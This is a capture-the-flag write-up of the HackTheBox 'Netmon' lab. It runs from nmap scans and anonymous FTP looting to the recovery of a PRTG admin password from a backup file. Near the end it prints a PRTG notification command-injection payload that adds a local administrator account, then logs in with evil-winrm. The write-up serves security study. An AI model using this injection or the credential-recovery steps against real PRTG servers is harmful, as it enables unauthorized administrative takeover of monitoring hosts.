Netmon

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.152 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Wed Nov 23 18:07:22 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.152
Nmap scan report for 10.10.10.152
Host is up (0.061s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

# Nmap done at Wed Nov 23 18:07:41 2022 -- 1 IP address (1 host up) scanned in 20.08 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 10.10.10.152 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Wed Nov 23 18:08:20 2022 as: nmap -sCV -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 -oN targeted 10.10.10.152
Nmap scan report for 10.10.10.152
Host is up (0.051s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-23T17:12:34
|_  start_date: 2022-11-23T17:06:50
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 3m10s, deviation: 0s, median: 3m10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 23 18:09:27 2022 -- 1 IP address (1 host up) scanned in 67.02 seconds

Exploitation

As we can see the anonymous user is allow in the FTP server.

ftp 10.10.10.152

Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

Inside is the entire filesystem of the Windows machine.

ftp> ls

229 Entering Extended Passive Mode (|||49722|)
150 Opening ASCII mode data connection.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
02-25-19  10:49PM       <DIR>          Windows
226 Transfer complete.

If we look inside the directory, we could see the user flag.

ftp> ls Users/Public/

229 Entering Extended Passive Mode (|||49873|)
150 Opening ASCII mode data connection.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
11-24-22  12:35PM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.

Let's download it to our local machine and read it.

ftp> get Users/Public/

ftp> get user.txt

ftp> exit

cat user.txt

e167266245f694804d5a826f16adf7d9

Privilege Escalation

If we take a look at the website, we'll see a PRTG Network Monitor.

As we can see in this article, the PRTG data directory is located at %programdata%\Paessler\PRTG Network Monitor. Let's see what is inside that directory with the FTP server.

ftp> cd ProgramData/Paessler/PRTG\ Network\ Monitor

ftp> ls

229 Entering Extended Passive Mode (|||50513|)
125 Data connection already open; Transfer starting.
12-15-21  07:23AM       <DIR>          Configuration Auto-Backups
11-24-22  12:35PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
11-24-22  12:35PM       <DIR>          Logs (Web Server)
11-24-22  12:40PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
11-24-22  01:16PM              1679623 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.

Let's download the PRTG Configuration.old.bak file.

ftp> get "PRTG Configuration.old.bak"

The file contains the PrTg@dmin2018 password for the prtgadmin user.

cat PRTG\ Configuration.old.bak | grep prtgadmin -A 1

              <!-- User: prtgadmin -->
              PrTg@dmin2018
--
                  prtgadmin
                </login>

But can't log in with these credentials.

As the file had the .old.bak extension, maybe this is an old password. If we try with the PrTg@dmin2019, we'll be able to log in.

There is a vulnerability in PRTG Network Monitor which allow an administrator to run commands on the system. Go to Setup, Notifications, Add new notification, then go to the Execute Program section of the notification, select the .ps1 options, and run the following command, which will create the alfa8sa user, and add it to the Administrators group.

test.txt; net user test alfa8sa1234! /add; net localgroup administrators test /add

To run the command, click on Send test notification.

Then, hit OK.

Now, check that the test user has been created.

cme smb 10.10.10.152 -u "test" -p 'alfa8sa1234!'

SMB         10.10.10.152    445    NETMON           [*] Windows Server 2016 Standard 14393 x64 (name:NETMON) (domain:netmon) (signing:False) (SMBv1:True)
SMB         10.10.10.152    445    NETMON           [+] netmon\test:alfa8sa1234! (Pwn3d!)

Now, all we have to do is get a shell as test with evil-winrm, reap the harvest and take the root flag.

evil-winrm -i 10.10.10.152 -u test

Enter Password: alfa8sa1234!

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\test\Documents> whoami
netmon\test
*Evil-WinRM* PS C:\Users\test\Documents> type \users\administrator\desktop\root.txt
75c2ea99cac3ffc3dea2665d9d02009e